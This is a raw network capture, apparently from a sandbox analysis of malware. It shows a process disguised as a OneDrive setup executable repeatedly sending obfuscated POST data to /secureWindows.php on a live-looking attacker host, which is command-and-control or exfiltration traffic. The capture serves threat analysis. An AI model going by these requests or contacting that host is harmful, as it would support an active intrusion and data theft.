                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=k6%2FpesHH2nXKAowkdZFAP%2FMf1t30RZIyhIftPfmK%2BQM05yk8ZDtMyGqzmvItyrwd1drryqPzK%2FXc7pI5s88%2B5pDrGMn3chLHASmSLFcI1ReWCLB2DyRnVIcJtpApPjltPxRt20psRo0%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a049dbaa4763-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1152&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1358&delivery_rate=1171521&cwnd=239&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a
                                                        Data Ascii: 43W_Y
                                                        Oct 30, 2024 05:22:46.429755926 CET5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        46192.168.2.449782188.114.96.3807760C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 30, 2024 05:22:46.568852901 CET310OUTPOST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1072
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:22:46.917681932 CET1072OUTData Raw: 57 55 5c 52 55 55 56 50 58 57 50 59 55 58 5b 58 54 5d 5c 5d 59 53 5a 5b 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: WU\RUUVPXWPYUX[XT]\]YSZ[]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R&,=+=$#.2=0X;:?7*8%,<&9Z$+)-* F$,Z*-
                                                        Oct 30, 2024 05:22:47.163036108 CET25INHTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:22:47.478554964 CET786INHTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:22:47 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZDJn%2By1qY3XCjtdXrXUxgyMK0%2B5%2FUvhSA31d6toUjpRWysgPRC613yjAkGI7TFkRPr7CuuO7zQ9zmVWS2ppxjh90WkKKpIQeuavR6F7XpmjYcLot8XrNy1PeS4fj0iCx552MHRVfCHY%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a0506b3a4870-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1149&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1382&delivery_rate=1298654&cwnd=231&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        47192.168.2.449783188.114.96.3807760C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 30, 2024 05:22:47.608357906 CET310OUTPOST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:22:47.995385885 CET1076OUTData Raw: 57 54 59 52 50 5e 53 50 58 57 50 59 55 5f 5b 5e 54 59 5c 5d 59 57 5a 54 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: WTYRP^SPXWPYU_[^TY\]YWZT]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%8&X<+!04,&3&-8) Z#9?%)]+[&8!:: F$,Z*
                                                        Oct 30, 2024 05:22:48.212956905 CET25INHTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:22:48.532212973 CET780INHTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:22:48 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2GOVraUT5FXg%2FUJHDgLBUvP2WkZaaPVVAFC0WmrboCpdEKVCmhNksZJBalSgCbw8dt8BUIsYcsF39ovH%2FxNFfYMqzOaBv4j3t%2FvN6FBlid5CFWgEdPKwlplrmKsqmezS8z1VunDVMhk%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a056fbe72e64-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1646&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1386&delivery_rate=905000&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a
                                                        Data Ascii: 43W_Y
                                                        Oct 30, 2024 05:22:48.532234907 CET5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        48192.168.2.449784188.114.96.3807760C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 30, 2024 05:22:48.663301945 CET310OUTPOST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:22:49.012535095 CET1076OUTData Raw: 57 51 59 56 50 5e 56 55 58 57 50 59 55 51 5b 5f 54 5b 5c 54 59 57 5a 5b 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: WQYVP^VUXWPYUQ[_T[\TYWZ[]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%, =+:Z08.3$=_;Y \ &7_)6>&85.* F$,Z*


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        49192.168.2.449785188.114.96.3807760C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 30, 2024 05:22:49.208282948 CET310OUTPOST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1340
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:22:49.558363914 CET1340OUTData Raw: 57 51 59 50 50 5a 56 5c 58 57 50 59 55 5f 5b 58 54 5b 5c 58 59 55 5a 55 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: WQYPPZV\XWPYU_[XT[\XYUZU]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%,3.?&%.+D9632^,* ,1_#])&)'%[: F$,Z*
                                                        Oct 30, 2024 05:22:49.813435078 CET25INHTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:22:50.120505095 CET933INHTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:22:50 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=v3ud3kgPf0H4N9Gytk%2FpEvxFRecr6c4h4S1uutijBae4eDZotQA7jc0pSErowfa2HD6SxygZH1cmFqX8H4357zcrrDNIAxpgZEZ4mVbF0JGEcVhLC6yjpvvp60iOa8%2BYCdLA1wVJnIk%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a060fb5b6c5e-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1151&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1650&delivery_rate=1306859&cwnd=246&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 39 38 0d 0a 01 1f 26 57 2b 16 37 0e 31 33 39 03 3c 2c 03 1d 2a 3e 25 04 33 1f 01 04 26 05 32 10 2b 3b 05 5e 3d 34 37 06 29 21 28 5d 20 25 34 5b 2a 2b 2f 46 0c 10 24 02 33 22 2c 0c 3c 23 2d 58 3d 06 3b 59 34 09 26 11 3e 39 01 54 21 0a 20 12 24 32 25 0f 3b 03 04 10 3a 25 2a 5b 2d 0a 20 1c 2a 3a 21 57 08 14 22 59 26 12 02 00 32 3d 0a 14 26 1c 26 11 22 2f 3b 11 36 38 2e 5c 3f 3b 2c 52 26 0e 38 1d 30 33 20 0e 32 07 0d 04 3c 32 2c 0d 27 33 22 52 2e 0d 20 56 03 32 58 53 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 98&W+7139<,*>%3&2+;^=47)!(] %4[*+/F$3",<#-X=;Y4&>9T! $2%;:%*[- *:!W"Y&2=&&"/;68.\?;,R&803 2<2,'3"R. V2XS0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        50192.168.2.449786188.114.96.3807760C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 30, 2024 05:22:49.436001062 CET310OUTPOST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:22:49.792682886 CET1076OUTData Raw: 57 54 59 55 50 5a 53 55 58 57 50 59 55 5c 5b 5d 54 5e 5c 5f 59 5d 5a 5c 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: WTYUPZSUXWPYU\[]T^\_Y]Z\]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%]/\+2Y%.;C,64%> ^8*4:<1,+53=_/* F$,Z*5
                                                        Oct 30, 2024 05:22:50.029676914 CET25INHTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:22:50.344172001 CET787INHTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:22:50 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zTkaaGqfoOAMyIfqa%2Fz%2BGuu5BGg29Oj7QdyHe%2FjcTRlZAXCg6Zmxp9lmjemFx8WPP0wpFeNxv%2BgGyq2XvKg%2FU%2FwnblLNhS07972kEiIKMOZNHRJWR5O2XyTKhQQMfn2b2ptKxSWqUpE%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a0625bdb3470-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1130&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1386&delivery_rate=1302158&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a
                                                        Data Ascii: 43W_Y
                                                        Oct 30, 2024 05:22:50.344187975 CET5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        51192.168.2.449787188.114.96.3807760C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 30, 2024 05:22:50.625813961 CET286OUTPOST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Oct 30, 2024 05:22:50.980386972 CET1076OUTData Raw: 57 5e 5c 50 55 55 56 54 58 57 50 59 55 5f 5b 5c 54 53 5c 55 59 5c 5a 59 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: W^\PUUVTXWPYU_[\TS\UY\ZY]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%Z,_=(-'=#C.4]2>8Y8$[#*Z1_7X?&>&+!:: F$,Z*
                                                        Oct 30, 2024 05:22:51.224934101 CET25INHTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:22:51.431576967 CET788INHTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:22:51 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2B3URUPnuugaeZkLW20HgwPg2pv4OWQMUJ9ktW2qS43%2Fu2DaRE7u9P6jozD%2BZlEyFW1IlxYK3dNBMBDYZWkoEmgshZFrABPVBmniBN0xN4nx9R1F7sn8PdvHLqm8eeFl576o%2Fsyoe2N4%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a069c8588d26-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1326&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1362&delivery_rate=1143759&cwnd=240&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        52192.168.2.449788188.114.96.3807760C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 30, 2024 05:22:51.567152023 CET286OUTPOST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Oct 30, 2024 05:22:51.917705059 CET1076OUTData Raw: 52 54 5c 57 55 55 56 53 58 57 50 59 55 51 5b 5c 54 52 5c 55 59 51 5a 5a 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: RT\WUUVSXWPYUQ[\TR\UYQZZ]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%[,"+8&Z0-C.6+%3847]%*+]<]$(-.: F$,Z*
                                                        Oct 30, 2024 05:22:52.176901102 CET25INHTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:22:52.514240026 CET785INHTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:22:52 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xVB1PFaC7A3kVlffBwEveSEo4%2BEdu6hj0WYgtwNNe5r3SJiTeu81Q2f5Rg%2Fxm36gtEuZ2Tw0DbMAvZyVsZGcfibRCyStPMKjqhfqjRPX5Wz7Xhl7kkRY2HktiptQxqrf29ublyl%2B1Vo%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a06fcb00b798-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1103&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1362&delivery_rate=1346976&cwnd=79&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        53192.168.2.449789188.114.96.3807760C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 30, 2024 05:22:52.637484074 CET310OUTPOST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:22:52.996052027 CET1076OUTData Raw: 52 50 5c 53 50 5a 53 56 58 57 50 59 55 5c 5b 5c 54 5e 5c 5d 59 5d 5a 5a 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: RP\SPZSVXWPYU\[\T^\]Y]ZZ]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R&8#9+]'-952[,Y;<Y"94%9+^+23(*. F$,Z*5
                                                        Oct 30, 2024 05:22:53.233419895 CET25INHTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:22:53.444359064 CET784INHTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:22:53 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=569WAd0Aws%2FYYte0F7G%2ByJRLiVb0SVBge14AeUragI8tm9i9kDfTwwPuDylgrEdoO9RtJH8PVN1zRrs7m4BvDu38Mm41tTi5YUAQAhzPbGqjjZ1AHUBXSnm1GRQDiFS57FgrsNDi800%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a0765cb0eaa4-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1033&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1386&delivery_rate=1473041&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        54192.168.2.449790188.114.96.3807760C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 30, 2024 05:22:53.573873997 CET310OUTPOST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1072
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:22:53.933357954 CET1072OUTData Raw: 57 51 5c 54 55 59 53 57 58 57 50 59 55 58 5b 5e 54 58 5c 5a 59 52 5a 5a 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: WQ\TUYSWXWPYUX[^TX\ZYRZZ]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%- =?+2'[89%42$_/*+#)7\%9)6)_0;". F$,Z*5
                                                        Oct 30, 2024 05:22:54.177365065 CET25INHTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:22:54.423239946 CET786INHTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:22:54 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MT6nRJ9UhLSh610BlLjxGOO4eF10v%2Be%2F9GFi5qVldpVth2qYGTLWJM9zjtgqLIjULckrYO9nw3YOhrG1C9lLC9oFmXbkrbdFzWfwvo1O5dlEVYyImao62TOq5WdAxG%2Ftz2FhgWiLIbw%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a07c4d39e91a-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1303&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1382&delivery_rate=1146476&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0
                                                        Oct 30, 2024 05:22:54.423285961 CET786INHTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:22:54 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MT6nRJ9UhLSh610BlLjxGOO4eF10v%2Be%2F9GFi5qVldpVth2qYGTLWJM9zjtgqLIjULckrYO9nw3YOhrG1C9lLC9oFmXbkrbdFzWfwvo1O5dlEVYyImao62TOq5WdAxG%2Ftz2FhgWiLIbw%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a07c4d39e91a-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1303&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1382&delivery_rate=1146476&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        55192.168.2.449792188.114.96.3807760C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 30, 2024 05:22:54.550302982 CET310OUTPOST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1072
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
